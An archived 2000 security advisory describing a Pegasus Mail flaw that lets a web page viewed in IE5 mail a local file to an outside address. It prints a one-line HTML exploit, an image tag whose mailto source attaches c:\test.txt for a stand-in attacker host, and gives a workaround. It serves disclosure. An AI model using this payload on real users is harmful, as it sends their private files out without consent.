OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Pegasus mail file reading vulnerability
From: Imran Ghory (ImranGBTINTERNET.COM)
Date: Tue Oct 03 2000 - 10:31:23 CDT


SUMMARY

The default setup of Pegasus Mail contains a remotely exploitable security
hole that allows a remote website to gain copies of files on the users hard
drive.

DETAILS

Version tested: Pegasus Mail v3.12c with IE5.0

When the webpage containing the exploit code is viewed using IE5,
Pegasus mail will automatically creates a message which has a copy
of the file "c:\test.txt" and is addressed to "hackerhakersite.com" and
queues it ready to be sent without any further user intervention

If instead of "hackerhakersite.com" we have a local user,
"hacker" the message won't be queued but just sent immediately.

Exploit code:

<img src="mailto:hackerhakersite.com -F c:\test.txt">

Temporary Fix:

1) Don't run Pegasus Mail at the same time as a web browser

This is not a complete solution as Pegasus Mail will load up if the exploit
code is run, but this at least will be more noticable to the user.

Vendor:

As I earlier posted a message to vuln-dev giving the basics of this exploit
without the realizing the consequeces (at that stage the user had to click on
a link for the exploit to come into play), I have decided to publish the full
exploit before contacting the vendor.

--
Imran Ghory